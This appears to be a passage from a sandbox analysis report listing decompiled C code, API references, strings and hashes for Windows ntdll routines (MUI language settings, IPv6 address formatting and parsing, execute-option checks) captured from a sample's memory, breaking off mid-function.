				_v56 = 0;
				if(E00A28460(__ecx, L"WindowsExcludedProcs",  &_v44,  &_v24,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						_t207 = E00A0E025(__ecx,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
					}
					_push(1);
					_v8 = _t318;
					E00A2718A(_t207);
					_t335 = _t335 + 4;
				}
				_v60 = _v60 | 0xffffffff;
				if(E00A28460(_t322, L"Kernel-MUI-Number-Allowed",  &_v44,  &_v24,  &_v8) >= 0) {
					_t333 =  *_v8;
					_v60 = _t333;
					_t314 = E00A0E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					_push(_t333);
					_v8 = _t318;
					E00A2718A(_t314);
					_t335 = _t335 + 4;
				}
				_t216 = E00A28460(_t322, L"Kernel-MUI-Language-Allowed",  &_v44,  &_v24,  &_v8);
				_t332 = ";";
				if(_t216 < 0) {
					L17:
					if(E00A28460(_t322, L"Kernel-MUI-Language-Disallowed",  &_v44,  &_v24,  &_v8) < 0) {
						L30:
						if(E00A28460(_t322, L"Kernel-MUI-Language-SKU",  &_v44,  &_v24,  &_v8) < 0) {
							L46:
							_t329 = 0;
							L47:
							if(_v8 != _t318) {
								E00A0E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
							}
							if(_v28 != _t318) {
								if(_v20 != _t318) {
									E00A0E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
									_v20 = _t318;
									_v40 = _t318;
								}
							}
							goto L49;
						}
						_t231 = _v24;
						_t322 = _t231 + 4;
						_push(_t231);
						_v52 = _t322;
						E00A2718A(_t231);
						if(_t322 == _t318) {
							_v32 = _t318;
						} else {
							_v32 = E00A0E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
						}
						if(_v32 == _t318) {
							_v52 = _t318;
							L58:
							_t329 = 0xc0000017;
							goto L47;
						} else {
							E00A02340(_v32, _v8, _v24);
							_v16 = _v32;
							_a4 = _t318;
							_t235 = E00A1E679(_v32, _t332);
							while(1) {
								_t319 = _t235;
								if(_t319 == 0) {
									break;
								}
								 *_t319 = 0;
								_t321 = _t319 + 2;
								E00A0E2A8(_t322,  &_v68, _v16);
								if(E00A25553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
								_v16 = _t321;
								_t235 = E00A1E679(_t321, _t332);
								_pop(_t322);
							}
							_t236 = _v16;
							if( *_v16 != _t319) {
								E00A0E2A8(_t322,  &_v68, _t236);
								if(E00A25553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
							}
							if(_a4 == 0) {
								E00A0E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v32);
								_v52 = _v52 & 0x00000000;
								_v32 = _v32 & 0x00000000;
							}
							if(_v8 != 0) {
								E00A0E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
							}
							_v8 = _v8 & 0x00000000;
							_t318 = 0;
							goto L46;
						}
					}
					_t257 = _v24;
					_t322 = _t257 + 4;
					_push(_t257);
					_v40 = _t322;
					E00A2718A(_t257);
					_t338 = _t335 + 4;
					if(_t322 == _t318) {
						_v20 = _t318;
					} else {
						_v20 = E00A0E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
					}
					if(_v20 == _t318) {
						_v40 = _t318;
						goto L58;
					} else {
						E00A02340(_v20, _v8, _v24);
						_v16 = _v20;
						_a4 = _t318;
						_t261 = E00A1E679(_v20, _t332);
						_t335 = _t338 + 0x14;
						while(1) {
							_v12 = _t261;
							if(_t261 == _t318) {
								break;
							}
							_v12 = _v12 + 2;
							 *_v12 = 0;
							E00A0E2A8(_v12,  &_v68, _v16);
							if(E00A25553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
							_v16 = _v12;
							_t261 = E00A1E679(_v12, _t332);
							_pop(_t322);
						}
						_t269 = _v16;
						if( *_v16 != _t318) {
							E00A0E2A8(_t322,  &_v68, _t269);
							if(E00A25553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
						}
						if(_a4 == _t318) {
							E00A0E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
							_v40 = _t318;
							_v20 = _t318;
						}
						if(_v8 != _t318) {
							E00A0E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
						}
						_v8 = _t318;
						goto L30;
					}
				}
				_t284 = _v24;
				_t322 = _t284 + 4;
				_push(_t284);
				_v48 = _t322;
				E00A2718A(_t284);
				_t339 = _t335 + 4;
				if(_t322 == _t318) {
					_v28 = _t318;
				} else {
					_v28 = E00A0E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
				}
				if(_v28 == _t318) {
					_v48 = _t318;
					goto L58;
				} else {
					E00A02340(_v28, _v8, _v24);
					_v16 = _v28;
					_a4 = _t318;
					_t288 = E00A1E679(_v28, _t332);
					_t335 = _t339 + 0x14;
					while(1) {
						_v12 = _t288;
						if(_t288 == _t318) {
							break;
						}
						_v12 = _v12 + 2;
						 *_v12 = 0;
						E00A0E2A8(_v12,  &_v68, _v16);
						if(E00A25553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
						_v16 = _v12;
						_t288 = E00A1E679(_v12, _t332);
						_pop(_t322);
					}
					_t296 = _v16;
					if( *_v16 != _t318) {
						E00A0E2A8(_t322,  &_v68, _t296);
						if(E00A25553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
					}
					if(_a4 == _t318) {
						E00A0E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v28);
						_v48 = _t318;
						_v28 = _t318;
					}
					if(_v8 != _t318) {
						E00A0E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					}
					_v8 = _t318;
					goto L17;
				}
			}

0x00a28788
0x00a28788
0x00a28791
0x00a28794
0x00a28798
0x00a2879b
0x00a2879e
0x00a287a1
0x00a287a4
0x00a287a7
0x00a287aa
0x00a287af
0x00a71ad3
0x00a28b0a
0x00a28b0d
0x00a28b13
0x00a28b19
0x00a28b1f
0x00a28b25
0x00a28b2b
0x00a28b31
0x00a28b37
0x00a28b3d
0x00a28b46
0x00a28b46
0x00a287c6
0x00a287d0
0x00a71ae0
0x00a71ae6
0x00a71af8
0x00a71af8
0x00a71afd
0x00a71afe
0x00a71b01
0x00a71b06
0x00a71b06
0x00a287d6
0x00a287f2
0x00a287f7
0x00a28807
0x00a2880a
0x00a2880f
0x00a28810
0x00a28813
0x00a28818
0x00a28818
0x00a2882c
0x00a28831
0x00a28838
0x00a28908
0x00a28920
0x00a289f0
0x00a28a08
0x00a28af6
0x00a28af6
0x00a28af8
0x00a28afb
0x00a71beb
0x00a71beb
0x00a28b04
0x00a71bf8
0x00a71c0e
0x00a71c13
0x00a71c16
0x00a71c16
0x00a71bf8
0x00000000
0x00a28b04
0x00a28a0e
0x00a28a11
0x00a28a14
0x00a28a15
0x00a28a18
0x00a28a22
0x00a28b59
0x00a28a28
0x00a28a3c
0x00a28a3c
0x00a28a42
0x00a71bb0
0x00a71b11
0x00a71b11
0x00000000
0x00a28a48
0x00a28a51
0x00a28a5b
0x00a28a5e
0x00a28a61
0x00a28a69
0x00a28a69
0x00a28a6d
0x00000000
0x00000000
0x00a28a74
0x00a28a7c
0x00a28a7d
0x00a28a91
0x00a28a93
0x00a28a93
0x00a28a98
0x00a28a9b
0x00a28aa1
0x00a28aa1
0x00a28aa4
0x00a28aaa
0x00a28ab1
0x00a28ac5
0x00a28ac7
0x00a28ac7
0x00a28ac5
0x00a28ace
0x00a71bc9
0x00a71bce
0x00a71bd2
0x00a71bd2
0x00a28ad8
0x00a28aeb
0x00a28aeb
0x00a28af0
0x00a28af4
0x00000000
0x00a28af4
0x00a28a42
0x00a28926
0x00a28929
0x00a2892c
0x00a2892d
0x00a28930
0x00a28935
0x00a2893a
0x00a28b51
0x00a28940
0x00a28954
0x00a28954
0x00a2895a
0x00a71b63
0x00000000
0x00a28960
0x00a28969
0x00a28973
0x00a28976
0x00a28979
0x00a2897e
0x00a28981
0x00a28981
0x00a28986
0x00000000
0x00000000
0x00a71b6e
0x00a71b74
0x00a71b7b
0x00a71b8f
0x00a71b91
0x00a71b91
0x00a71b99
0x00a71b9c
0x00a71ba2
0x00a71ba2
0x00a2898c
0x00a28992
0x00a28999
0x00a289ad
0x00a71ba8
0x00a71ba8
0x00a289ad
0x00a289b6
0x00a289c8
0x00a289cd
0x00a289d0
0x00a289d0
0x00a289d6
0x00a289e8
0x00a289e8
0x00a289ed
0x00000000
0x00a289ed
0x00a2895a
0x00a2883e
0x00a28841
0x00a28844
0x00a28845
0x00a28848
0x00a2884d
0x00a28852
0x00a28b49
0x00a28858
0x00a2886c
0x00a2886c
0x00a28872
0x00a71b0e
0x00000000
0x00a28878
0x00a28881
0x00a2888b
0x00a2888e
0x00a28891
0x00a28896
0x00a28899
0x00a28899
0x00a2889e
0x00000000
0x00000000
0x00a71b21
0x00a71b27
0x00a71b2e
0x00a71b42
0x00a71b44
0x00a71b44
0x00a71b4c
0x00a71b4f
0x00a71b55
0x00a71b55
0x00a288a4
0x00a288aa
0x00a288b1
0x00a288c5
0x00a71b5b
0x00a71b5b
0x00a288c5
0x00a288ce
0x00a288e0
0x00a288e5
0x00a288e8
0x00a288e8
0x00a288ee
0x00a28900
0x00a28900
0x00a28905
0x00000000
0x00a28905

APIs

_wcspbrk.LIBCMT ref: 00A28891
_wcspbrk.LIBCMT ref: 00A28979
_wcspbrk.LIBCMT ref: 00A28A61
_wcspbrk.LIBCMT ref: 00A28A9B
_wcspbrk.LIBCMT ref: 00A71B9C

Strings

Kernel-MUI-Language-SKU, xrefs: 00A289FC
Kernel-MUI-Language-Disallowed, xrefs: 00A28914
Kernel-MUI-Language-Allowed, xrefs: 00A28827
Kernel-MUI-Number-Allowed, xrefs: 00A287E6
WindowsExcludedProcs, xrefs: 00A287C1

Memory Dump Source

Source File: 00000006.00000002.2225070675.00000000009F0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000006.00000002.2225066697.00000000009E0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225142574.0000000000AD0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225148135.0000000000AE0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225152637.0000000000AE4000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225156521.0000000000AE7000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225160401.0000000000AF0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225192623.0000000000B50000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_9e0000_vbc.jbxd

Similarity

API ID: _wcspbrk
String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
API String ID: 402402107-258546922
Opcode ID: c9c9ec179aad099c43d39130170d434657862eb9623271d1cc944fe714be48b1
Instruction ID: 503236c3e890c062753b3303cdb6cdf9fdf712f62648cd8bfc69079971de652b
Opcode Fuzzy Hash: c9c9ec179aad099c43d39130170d434657862eb9623271d1cc944fe714be48b1
Instruction Fuzzy Hash: 5BF1F7B2D00219EFCF11EF98DA819EEB7B8FF08300F14846AF505A7251EB359A45DB60

Uniqueness

Uniqueness Score: -1.00%

Function 00A413CB, Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 195
COMMON

Download Yara Rule

C-Code - Quality: 38%

			E00A413CB(intOrPtr* _a4, intOrPtr _a8) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _t71;
				signed int _t78;
				signed int _t86;
				char _t90;
				signed int _t91;
				signed int _t96;
				intOrPtr _t108;
				signed int _t114;
				void* _t115;
				intOrPtr _t128;
				intOrPtr* _t129;
				void* _t130;

				_t129 = _a4;
				_t128 = _a8;
				_t116 = 0;
				_t71 = _t128 + 0x5c;
				_v8 = 8;
				_v20 = _t71;
				if( *_t129 == 0) {
					if( *((intOrPtr*)(_t129 + 2)) != 0 ||  *((intOrPtr*)(_t129 + 4)) != 0 ||  *((intOrPtr*)(_t129 + 6)) != 0 ||  *(_t129 + 0xc) == 0) {
						goto L5;
					} else {
						_t96 =  *(_t129 + 8) & 0x0000ffff;
						if(_t96 != 0) {
							L38:
							if(_t96 != 0xffff ||  *(_t129 + 0xa) != _t116) {
								goto L5;
							} else {
								_push( *(_t129 + 0xf) & 0x000000ff);
								_push( *(_t129 + 0xe) & 0x000000ff);
								_push( *(_t129 + 0xd) & 0x000000ff);
								_t86 = E00A37707(_t128, _t71 - _t128 >> 1, L"::ffff:0:%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff);
								L36:
								return _t128 + _t86 * 2;
							}
						}
						_t114 =  *(_t129 + 0xa) & 0x0000ffff;
						if(_t114 == 0) {
							L33:
							_t115 = 0xa02926;
							L35:
							_push( *(_t129 + 0xf) & 0x000000ff);
							_push( *(_t129 + 0xe) & 0x000000ff);
							_push( *(_t129 + 0xd) & 0x000000ff);
							_push( *(_t129 + 0xc) & 0x000000ff);
							_t86 = E00A37707(_t128, _t71 - _t128 >> 1, L"::%hs%u.%u.%u.%u", _t115);
							goto L36;
						}
						if(_t114 != 0xffff) {
							_t116 = 0;
							goto L38;
						}
						if(_t114 != 0) {
							_t115 = 0xa09cac;
							goto L35;
						}
						goto L33;
					}
				} else {
					L5:
					_a8 = _t116;
					_a4 = _t116;
					_v12 = _t116;
					if(( *(_t129 + 8) & 0x0000fffd) == 0) {
						if( *(_t129 + 0xa) == 0xfe5e) {
							_v8 = 6;
						}
					}
					_t90 = _v8;
					if(_t90 <= _t116) {
						L11:
						if(_a8 - _a4 <= 1) {
							_a8 = _t116;
							_a4 = _t116;
						}
						_t91 = 0;
						if(_v8 <= _t116) {
							L22:
							if(_v8 < 8) {
								_push( *(_t129 + 0xf) & 0x000000ff);
								_push( *(_t129 + 0xe) & 0x000000ff);
								_push( *(_t129 + 0xd) & 0x000000ff);
								_t128 = _t128 + E00A37707(_t128, _t71 - _t128 >> 1, L":%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff) * 2;
							}
							return _t128;
						} else {
							L14:
							L14:
							if(_a4 > _t91 || _t91 >= _a8) {
								if(_t91 != _t116 && _t91 != _a8) {
									_push(":");
									_push(_t71 - _t128 >> 1);
									_push(_t128);
									_t128 = _t128 + E00A37707() * 2;
									_t71 = _v20;
									_t130 = _t130 + 0xc;
								}
								_t78 = E00A37707(_t128, _t71 - _t128 >> 1, L"%x",  *(_t129 + _t91 * 2) & 0x0000ffff);
								_t130 = _t130 + 0x10;
							} else {
								_push(L"::");
								_push(_t71 - _t128 >> 1);
								_push(_t128);
								_t78 = E00A37707();
								_t130 = _t130 + 0xc;
								_t91 = _a8 - 1;
							}
							_t91 = _t91 + 1;
							_t128 = _t128 + _t78 * 2;
							_t71 = _v20;
							if(_t91 >= _v8) {
								goto L22;
							}
							_t116 = 0;
							goto L14;
						}
					} else {
						_t108 = 1;
						_v16 = _t129;
						_v24 = _t90;
						do {
							if( *_v16 == _t116) {
								if(_t108 - _v12 > _a8 - _a4) {
									_a4 = _v12;
									_a8 = _t108;
								}
								_t116 = 0;
							} else {
								_v12 = _t108;
							}
							_v16 = _v16 + 2;
							_t108 = _t108 + 1;
							_t26 =  &_v24;
							 *_t26 = _v24 - 1;
						} while ( *_t26 != 0);
						goto L11;
					}
				}
			}

0x00a413d5
0x00a413d9
0x00a413dc
0x00a413de
0x00a413e1
0x00a413e8
0x00a413ee
0x00a6e8fd
0x00000000
0x00a6e921
0x00a6e921
0x00a6e928
0x00a6e982
0x00a6e98a
0x00000000
0x00a6e99a
0x00a6e99e
0x00a6e9a3
0x00a6e9a8
0x00a6e9b9
0x00a6e978
0x00000000
0x00a6e978
0x00a6e98a
0x00a6e92a
0x00a6e931
0x00a6e944
0x00a6e944
0x00a6e950
0x00a6e954
0x00a6e959
0x00a6e95e
0x00a6e963
0x00a6e970
0x00000000
0x00a6e975
0x00a6e93b
0x00a6e980
0x00000000
0x00a6e980
0x00a6e942
0x00a6e94b
0x00000000
0x00a6e94b
0x00000000
0x00a6e942
0x00a413f4
0x00a413f4
0x00a413f9
0x00a413fc
0x00a413ff
0x00a41406
0x00a6e9cc
0x00a6e9d2
0x00a6e9d2
0x00a6e9cc
0x00a4140c
0x00a41411
0x00a41431
0x00a4143a
0x00a4143c
0x00a4143f
0x00a4143f
0x00a41442
0x00a41447
0x00a414a8
0x00a414ac
0x00a6e9e2
0x00a6e9e7
0x00a6e9ec
0x00a6ea05
0x00a6ea05
0x00000000
0x00a41449
0x00000000
0x00a41449
0x00a4144c
0x00a41459
0x00a41462
0x00a41469
0x00a4146a
0x00a41470
0x00a41473
0x00a41476
0x00a41476
0x00a41490
0x00a41495
0x00a4138e
0x00a41390
0x00a41397
0x00a41398
0x00a41399
0x00a413a1
0x00a413a4
0x00a413a4
0x00a41498
0x00a4149c
0x00a4149f
0x00a414a2
0x00000000
0x00000000
0x00a414a4
0x00000000
0x00a414a4
0x00a41413
0x00a41415
0x00a41416
0x00a41419
0x00a4141c
0x00a41422
0x00a413b7
0x00a413bc
0x00a413bf
0x00a413bf
0x00a413c2
0x00a41424
0x00a41424
0x00a41424
0x00a41427
0x00a4142b
0x00a4142c
0x00a4142c
0x00a4142c
0x00000000
0x00a4141c
0x00a41411

APIs

___swprintf_l.LIBCMT ref: 00A4146B
___swprintf_l.LIBCMT ref: 00A41490
___swprintf_l.LIBCMT ref: 00A6E970

Strings

ffff:, xrefs: 00A6E94B
::ffff:0:%u.%u.%u.%u, xrefs: 00A6E9B0
::%hs%u.%u.%u.%u, xrefs: 00A6E967
:%u.%u.%u.%u, xrefs: 00A6E9F4

Memory Dump Source

Source File: 00000006.00000002.2225070675.00000000009F0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000006.00000002.2225066697.00000000009E0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225142574.0000000000AD0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225148135.0000000000AE0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225152637.0000000000AE4000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225156521.0000000000AE7000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225160401.0000000000AF0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225192623.0000000000B50000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_9e0000_vbc.jbxd

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: b16b0bea5005bea69a3bf7b0a6fb287ac22d3ffac5c6352282c5918b8a66998c
Instruction ID: e1aa2b2cf0698a4e7c588b1044186aa14fb124dc3b19fd814b75ede9394aa804
Opcode Fuzzy Hash: b16b0bea5005bea69a3bf7b0a6fb287ac22d3ffac5c6352282c5918b8a66998c
Instruction Fuzzy Hash: 766127B9904655AACB34DF99C8808BFBBF5EFD4300B14C52DF5D647581D374AA80DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00A37EFD, Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 127
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E00A37EFD(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				char _v540;
				unsigned int _v544;
				signed int _v548;
				intOrPtr _v552;
				char _v556;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t33;
				void* _t38;
				unsigned int _t46;
				unsigned int _t47;
				unsigned int _t52;
				intOrPtr _t56;
				unsigned int _t62;
				void* _t69;
				void* _t70;
				intOrPtr _t72;
				signed int _t73;
				void* _t74;
				void* _t75;
				void* _t76;
				void* _t77;

				_t33 =  *0xae2088; // 0x7777f11a
				_v8 = _t33 ^ _t73;
				_v548 = _v548 & 0x00000000;
				_t72 = _a4;
				if(L00A37F4F(__ecx, _t72 + 0x2c,  &_v548) >= 0) {
					__eflags = _v548;
					if(_v548 == 0) {
						goto L1;
					}
					_t62 = _t72 + 0x24;
					E00A53F92(0x55, 3, "CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions\n", _v548);
					_t71 = 0x214;
					_v544 = 0x214;
					E00A0DFC0( &_v540, 0, 0x214);
					_t75 = _t74 + 0x20;
					_t46 =  *0xae4218( *((intOrPtr*)(_t72 + 0x28)),  *((intOrPtr*)(_t72 + 0x18)),  *((intOrPtr*)(_t72 + 0x20)), L"ExecuteOptions",  &_v556,  &_v540,  &_v544, _t62);
					__eflags = _t46;
					if(_t46 == 0) {
						goto L1;
					}
					_t47 = _v544;
					__eflags = _t47;
					if(_t47 == 0) {
						goto L1;
					}
					__eflags = _t47 - 0x214;
					if(_t47 >= 0x214) {
						goto L1;
					}
					_push(_t62);
					 *((short*)(_t73 + (_t47 >> 1) * 2 - 0x21a)) = 0;
					E00A53F92(0x55, 3, "CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database\n",  &_v540);
					_t52 = E00A10D27( &_v540, L"Execute=1");
					_t76 = _t75 + 0x1c;
					_push(_t62);
					__eflags = _t52;
					if(_t52 == 0) {
						E00A53F92(0x55, 3, "CLIENT(ntdll): Processing %ws for patching section protection for %wZ\n",  &_v540);
						_t71 =  &_v540;
						_t56 = _t73 + _v544 - 0x218;
						_t77 = _t76 + 0x14;
						_v552 = _t56;
						__eflags = _t71 - _t56;
						if(_t71 >= _t56) {
							goto L1;
						} else {
							goto L10;
						}
						while(1) {
							L10:
							_t62 = E00A18375(_t71, 0x20);
							_pop(_t69);
							__eflags = _t62;
							if(__eflags != 0) {
								__eflags = 0;
								 *_t62 = 0;
							}
							E00A53F92(0x55, 3, "CLIENT(ntdll): Processing section info %ws...\n", _t71);
							_t77 = _t77 + 0x10;
							E00A7E8DB(_t69, _t70, __eflags, _t72, _t71);
							__eflags = _t62;
							if(_t62 == 0) {
								goto L1;
							}
							_t31 = _t62 + 2; // 0x2
							_t71 = _t31;
							__eflags = _t71 - _v552;
							if(_t71 >= _v552) {
								goto L1;
							}
						}
					}
					_push("CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ\n");
					_push(3);
					_push(0x55);
					E00A53F92();
					_t38 = 1;
					L2:
					return E00A0E1B4(_t38, _t62, _v8 ^ _t73, _t70, _t71, _t72);
				}
				L1:
				_t38 = 0;
				goto L2;
			}

0x00a37f08
0x00a37f0f
0x00a37f12
0x00a37f1b
0x00a37f31
0x00a53ead
0x00a53eb4
0x00000000
0x00000000
0x00a53eba
0x00a53ecd
0x00a53ed2
0x00a53ee1
0x00a53ee7
0x00a53eec
0x00a53f12
0x00a53f18
0x00a53f1a
0x00000000
0x00000000
0x00a53f20
0x00a53f26
0x00a53f28
0x00000000
0x00000000
0x00a53f2e
0x00a53f30
0x00000000
0x00000000
0x00a53f3a
0x00a53f3b
0x00a53f53
0x00a53f64
0x00a53f69
0x00a53f6c
0x00a53f6d
0x00a53f6f
0x00a5e304
0x00a5e30f
0x00a5e315
0x00a5e31e
0x00a5e321
0x00a5e327
0x00a5e329
0x00000000
0x00000000
0x00000000
0x00000000
0x00a5e32f
0x00a5e32f
0x00a5e337
0x00a5e33a
0x00a5e33b
0x00a5e33d
0x00a5e33f
0x00a5e341
0x00a5e341
0x00a5e34e
0x00a5e353
0x00a5e358
0x00a5e35d
0x00a5e35f
0x00000000
0x00000000
0x00a5e365
0x00a5e365
0x00a5e368
0x00a5e36e
0x00000000
0x00000000
0x00a5e374
0x00a5e32f
0x00a53f75
0x00a53f7a
0x00a53f7c
0x00a53f7e
0x00a53f86
0x00a37f39
0x00a37f47
0x00a37f47
0x00a37f37
0x00a37f37
0x00000000

APIs

BaseQueryModuleData.KERNEL32(?,00000000,00000000,ExecuteOptions,?,?,?), ref: 00A53F12

Strings

CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 00A53F75
ExecuteOptions, xrefs: 00A53F04
CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 00A53EC4
Execute=1, xrefs: 00A53F5E
CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 00A53F4A
CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 00A5E2FB
H&`, xrefs: 00A37F1E
CLIENT(ntdll): Processing section info %ws..., xrefs: 00A5E345

Memory Dump Source

Source File: 00000006.00000002.2225070675.00000000009F0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000006.00000002.2225066697.00000000009E0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225142574.0000000000AD0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225148135.0000000000AE0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225152637.0000000000AE4000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225156521.0000000000AE7000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225160401.0000000000AF0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225192623.0000000000B50000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_9e0000_vbc.jbxd

Similarity

API ID: BaseDataModuleQuery
String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions$H&`
API String ID: 3901378454-1332074136
Opcode ID: 9d504fc12a46adb3beabcb99136cca8b3dcf1f93692dabe1d1dec537fb2d19a4
Instruction ID: bcf8181ec82f7fa613407dd87d0071683dedaee3ec0dbeed21306069688623c8
Opcode Fuzzy Hash: 9d504fc12a46adb3beabcb99136cca8b3dcf1f93692dabe1d1dec537fb2d19a4
Instruction Fuzzy Hash: D2418672A8031C7ADF24DA94DCCAFEE73BCBB54701F0045A9B505A61C1EA709B49CF61

Uniqueness

Uniqueness Score: -1.00%

Function 00A40B15, Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 272
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00A40B15(intOrPtr* _a4, char _a7, intOrPtr* _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				void* _t108;
				void* _t116;
				char _t120;
				short _t121;
				void* _t128;
				intOrPtr* _t130;
				char _t132;
				short _t133;
				intOrPtr _t141;
				signed int _t156;
				signed int _t174;
				intOrPtr _t177;
				intOrPtr* _t179;
				intOrPtr _t180;
				void* _t183;

				_t179 = _a4;
				_t141 =  *_t179;
				_v16 = 0;
				_v28 = 0;
				_v8 = 0;
				_v24 = 0;
				_v12 = 0;
				_v32 = 0;
				_v20 = 0;
				if(_t141 == 0) {
					L41:
					 *_a8 = _t179;
					_t180 = _v24;
					if(_t180 != 0) {
						if(_t180 != 3) {
							goto L6;
						}
						_v8 = _v8 + 1;
					}
					_t174 = _v32;
					if(_t174 == 0) {
						if(_v8 == 7) {
							goto L43;
						}
						goto L6;
					}
					L43:
					if(_v16 != 1) {
						if(_v16 != 2) {
							goto L6;
						}
						 *((short*)(_a12 + _v20 * 2)) = 0;
						L47:
						if(_t174 != 0) {
							E00A18980(_a12 + 0x10 + (_t174 - _v8) * 2, _a12 + _t174 * 2, _v8 - _t174 + _v8 - _t174);
							_t116 = 8;
							E00A0DFC0(_a12 + _t174 * 2, 0, _t116 - _v8 + _t116 - _v8);
						}
						return 0;
					}
					if(_t180 != 0) {
						if(_v12 > 3) {
							goto L6;
						}
						_t120 = E00A40CFA(_v28, 0, 0xa);
						_t183 = _t183 + 0xc;
						if(_t120 > 0xff) {
							goto L6;
						}
						 *((char*)(_t180 + _v20 * 2 + _a12)) = _t120;
						goto L47;
					}
					if(_v12 > 4) {
						goto L6;
					}
					_t121 = E00A40CFA(_v28, _t180, 0x10);
					_t183 = _t183 + 0xc;
					 *((short*)(_a12 + _v20 * 2)) = _t121;
					goto L47;
				} else {
					while(1) {
						_t123 = _v16;
						if(_t123 == 0) {
							goto L7;
						}
						_t108 = _t123 - 1;
						if(_t108 != 0) {
							goto L1;
						}
						_t178 = _t141;
						if(E00A406BA(_t108, _t141) == 0 || _t135 == 0) {
							if(E00A406BA(_t135, _t178) == 0 || E00A40A5B(_t136, _t178) == 0) {
								if(_t141 != 0x3a) {
									if(_t141 == 0x2e) {
										if(_a7 != 0 || _v24 > 2 || _v8 > 6) {
											goto L41;
										} else {
											_v24 = _v24 + 1;
											L27:
